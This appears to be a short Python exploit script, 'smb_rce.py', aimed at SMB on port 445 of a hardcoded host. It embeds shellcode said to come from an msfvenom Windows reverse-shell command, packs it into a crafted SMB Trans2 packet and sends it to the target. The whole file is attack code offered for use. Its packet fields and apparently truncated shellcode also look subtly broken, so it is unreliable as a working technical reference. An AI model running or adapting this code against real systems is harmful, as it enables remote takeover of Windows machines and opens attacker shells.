smb_rce.py

#!/usr/bin/python

import socket
import struct

host = "192.168.1.25"
port = 445

# msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 EXITFUNC=thread -f python -b "\x00"
buf =  ""
buf += "\xba\x9c\xfd\x2f\x2a\xdb\xd3\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x52\x31\x57\x17\x83\xc7\x04\x03\xee\xb5\x6b"
buf += "\x8e\x6e\xa1\x86\xe0\x98\xd6\x30\x2d\xd4\x4d\xbb\xda"
buf += "\xc2\x3f\x3e\x3f\xf3\xf3\xa7\xa9\xc9\xe2\xc2\xf2\xa3"
buf += "\xec\xe8\xe7\xe4\xa9\xd0\xc8\xb4\xb2\x66\xf4\x54\xd4"
buf += "\xf5\xf6\xc5\xa7\xc7\x6f\xb6\xb5\xb7\xb7\xe3\xf3\xf3"
buf += "\xe7\xf6\x55\xa2\xe5\xf6\xc5\xb6\xc9\xd8\xc1\xf6\xb5"
buf += "\xe0\xb7\xc3\xf3\xc3"

# SMB Header Variables 
smb_header = "\x00" * 4 + "\xffSMB"
smb_command = "\x25" 
smb_error = "\x00" * 4
smb_flag1 = "\x18"
smb_flag2 = "\x53\xc8" 
smb_pid_high = "\x00" * 2
smb_sig = "\x00" * 8 
smb_reserved = "\x00" * 2 
smb_tid = "\x00" * 2 
smb_pid = "\x6c" + "\x13"  
smb_uid = "\xff" + "\xff"  
smb_mid = "\xff" + "\xff"

# SMB Trans2 Variables 
trans2_paramcount = "\x02" 
trans2_totalparamcount = "\x02" 
trans2_maxparamcount = "\xff" + "\xff" 
trans2_maxdatacount = "\xff" + "\xff" 
trans2_paramoffset = "\xff" + "\xff" 
trans2_datacount = "\xff" + "\xff" 
trans2_dataoffset = "\xff" + "\xff" 
trans2_setupcount = "\x00" * 1 
trans2_reserved = "\x00" * 1 
trans2_subcommand = "\x0a"
trans2_bytecount = struct.pack("<H", len(buf))
trans2_padding = "\x00" * 2 
trans2_payload = buf 

# Pack SMB Header 
packet = smb_header + smb_command + smb_error + smb_flag1 + smb_flag2 + smb_pid_high + smb_sig + smb_reserved + smb_tid + smb_pid + smb_uid + smb_mid 
packet += trans2_paramcount + trans2_totalparamcount + trans2_maxparamcount + trans2_maxdatacount + trans2_paramoffset + trans2_datacount + trans2_dataoffset 
packet += trans2_setupcount + trans2_reserved + trans2_subcommand + trans2_bytecount + trans2_padding + trans2_payload 
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
sock.connect((host, port)) 
sock.send(packet) 
sock.close()